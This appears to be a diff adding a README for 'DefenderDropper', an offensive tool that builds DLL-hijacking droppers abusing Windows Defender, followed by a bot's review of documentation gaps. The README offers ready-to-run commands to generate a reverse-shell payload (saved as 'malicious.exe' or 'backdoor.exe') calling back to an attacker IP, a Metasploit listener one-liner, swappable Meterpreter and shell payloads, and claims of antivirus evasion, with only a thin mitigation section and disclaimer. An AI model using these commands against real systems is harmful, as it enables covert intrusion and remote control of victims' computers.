|
1 | | -# DefenderDropper |
2 | | -Advanced DLL Hijacking Payload Generator Using Windows Defender Vulnerabilities |
| 1 | +# DefenderDropper |
| 2 | + |
| 3 | +**Advanced DLL Hijacking Payload Generator Using Windows Defender Vulnerabilities** |
| 4 | + |
| 5 | + |
| 6 | +[](https://python.org) |
| 7 | +[](https://metasploit.com) |
| 8 | +[](LICENSE) |
| 9 | + |
| 10 | +## Overview |
| 11 | + |
| 12 | +DefenderDropper is an advanced payload generation tool that leverages the DLL hijacking vulnerability in Windows Defender, originally discovered by [TwoSevenOneT](https://github.com/TwoSevenOneT/DefenderWrite). This tool automates the creation of sophisticated payloads that bypass security controls by hijacking legitimate Windows Defender processes. |
| 13 | + |
| 14 | +> **Inspired by**: [TwoSevenOneT/DefenderWrite](https://github.com/TwoSevenOneT/DefenderWrite) |
| 15 | +
|
| 16 | +## Features |
| 17 | + |
| 18 | +- **Windows Defender Exploitation**: Leverages DLL hijacking in Windows Defender |
| 19 | +- **Automated Payload Generation**: Creates ready-to-use droppers and DLLs |
| 20 | +- **Metasploit Integration**: Seamless integration with Meterpreter payloads |
| 21 | +- **Static Compilation**: No external dependencies required |
| 22 | +- **Stealth Execution**: Runs through legitimate system processes |
| 23 | +- **Multiple Payload Support**: Various reverse shell and Meterpreter options |
| 24 | + |
| 25 | +## Quick Start |
| 26 | + |
| 27 | +### Prerequisites |
| 28 | + |
| 29 | +```bash |
| 30 | +# Install dependencies on Debian/Kali |
| 31 | +sudo apt update |
| 32 | +sudo apt install python3 metasploit-framework mingw-w64 -y |
| 33 | +``` |
| 34 | +# Installation |
| 35 | +```bash |
| 36 | +git clone https://github.com/YourUsername/DefenderDropper.git |
| 37 | +cd DefenderDropper |
| 38 | +``` |
| 39 | + |
| 40 | +# Generate payload |
| 41 | +``` |
| 42 | +python3 defenderdropper.py 10.0.2.147 4443 -o malicious.exe |
| 43 | +``` |
| 44 | +# Start Metasploit listener |
| 45 | +``` |
| 46 | +msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_tcp; set LHOST 10.0.2.147; set LPORT 4443; exploit' |
| 47 | +``` |
| 48 | + |
| 49 | +# How It Works |
| 50 | +Technical Overview |
| 51 | +DLL Hijacking: Exploits Windows Defender's vulnerable update process |
| 52 | + |
| 53 | +Process Injection: Injects shellcode into legitimate system processes |
| 54 | + |
| 55 | +Persistence: Leverages trusted Windows components for execution |
| 56 | + |
| 57 | +Evasion: Bypasses common security controls and antivirus solutions |
| 58 | + |
| 59 | +# Attack Flow |
| 60 | + |
| 61 | + |
| 62 | + |
| 63 | + |
| 64 | +# File Structure |
| 65 | +``` |
| 66 | +DefenderDropper/ |
| 67 | +├── defenderdropper.py # Main payload generator |
| 68 | +├── payload.exe # Generated dropper |
| 69 | +├── payload.dll # Shellcode DLL |
| 70 | +├── DefenderWrite.exe # Core exploit tool |
| 71 | +├── README.md |
| 72 | +└── LICENSE |
| 73 | +``` |
| 74 | +# Usage Examples |
| 75 | +Basic Meterpreter Payload |
| 76 | +```bash |
| 77 | +python3 defenderdropper.py 192.168.1.100 4444 -o backdoor.exe |
| 78 | +``` |
| 79 | + |
| 80 | + |
| 81 | +# Advanced Features |
| 82 | +Custom Payloads |
| 83 | + |
| 84 | +You can modify the generate_shellcode() function to use different Metasploit payloads, on defenderdropper.py search for windows/x64/meterpreter_reverse_tcp and replace it with other payloads: |
| 85 | + |
| 86 | +``` |
| 87 | +"-p", "windows/x64/shell_reverse_tcp", # Simple reverse shell |
| 88 | +"-p", "windows/meterpreter/reverse_https", # HTTPS payload |
| 89 | +"-p", "windows/x64/meterpreter/reverse_tcp", # Standard Meterpreter |
| 90 | +``` |
| 91 | + |
| 92 | +# Defense & Mitigation |
| 93 | +Detection |
| 94 | +Monitor for unusual msiexec.exe child processes |
| 95 | + |
| 96 | +Watch for DLL files in Windows Defender directory |
| 97 | + |
| 98 | +Analyze process hollowing techniques |
| 99 | + |
| 100 | +# Prevention |
| 101 | +Keep Windows Defender updated |
| 102 | + |
| 103 | +Implement application whitelisting |
| 104 | + |
| 105 | +Use advanced endpoint protection |
| 106 | + |
| 107 | +Regular security audits |
| 108 | + |
| 109 | +# Legal Disclaimer |
| 110 | +This tool is intended for: |
| 111 | + |
| 112 | + Security research |
| 113 | + |
| 114 | + Penetration testing with proper authorization |
| 115 | + |
| 116 | + Educational purposes |
| 117 | + |
| 118 | + Red team exercises |
| 119 | + |
| 120 | + Illegal use of this tool is strictly prohibited. The developers are not responsible for any misuse or damage caused by this tool. Always ensure you have explicit permission before testing any systems. |
| 121 | + |
| 122 | +# Contributing |
| 123 | +We welcome contributions from the security community! Feel free to: |
| 124 | + |
| 125 | +Fork the repository |
| 126 | + |
| 127 | +Create feature branches |
| 128 | + |
| 129 | +Submit pull requests |
| 130 | + |
| 131 | +Report issues and suggestions |
| 132 | + |
| 133 | +# Special Thanks |
| 134 | +TwoSevenOneT for the original DefenderWrite research |
| 135 | + |
| 136 | +The cybersecurity community for continuous improvement |
| 137 | + |
| 138 | +# License |
| 139 | +This project is licensed under the MIT License - see the [LICENSE](https://github.com/HackScaleTeam/DefenderDropper/LICENSE). file for details. |
| 140 | + |
| 141 | + Security is a shared responsibility. Use this tool wisely and ethically. |
| 142 | + |
| 143 | +Built with ❤️ for the cybersecurity community. Inspired by groundbreaking research from TwoSevenOneT. |
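Review bot: The "Defense & Mitigation" section (new lines 93-98) does not match the mechanism the README itself describes: it tells defenders to "Monitor for unusual msiexec.exe child processes" and "Analyze process hollowing techniques", yet nothing in "Technical Overview" (lines 50-57) mentions msiexec.exe or process hollowing, so either the mechanism description or the detection guidance is wrong; the one detection that does follow from the text, "Watch for DLL files in Windows Defender directory", should be made concrete (which directory, which file name the dropper writes, which process loads it) so a defender can actually write a rule from it. Related documentation gaps: "Prevention" says "Keep Windows Defender updated" without stating which Defender/platform builds are affected or whether the issue is patched; "File Structure" (line 70) ships `DefenderWrite.exe # Core exploit tool` as a bare binary with no source pointer, build instructions or checksum, which readers cannot verify; and "Attack Flow" (lines 59-63) is empty. Formatting: the badge lines 6-8 are `[](...)` with the image part missing; headings drop from `## Quick Start` / `### Prerequisites` back to `#` for "Installation", "Generate payload" and every later section; the fences at lines 41 and 45 lack the `bash` tag used at 29 and 76; the clone URL at line 36 still says `YourUsername` while the license link at line 139 uses `HackScaleTeam`, and that link has a stray `. file for details` and omits the `blob/<branch>/` path segment.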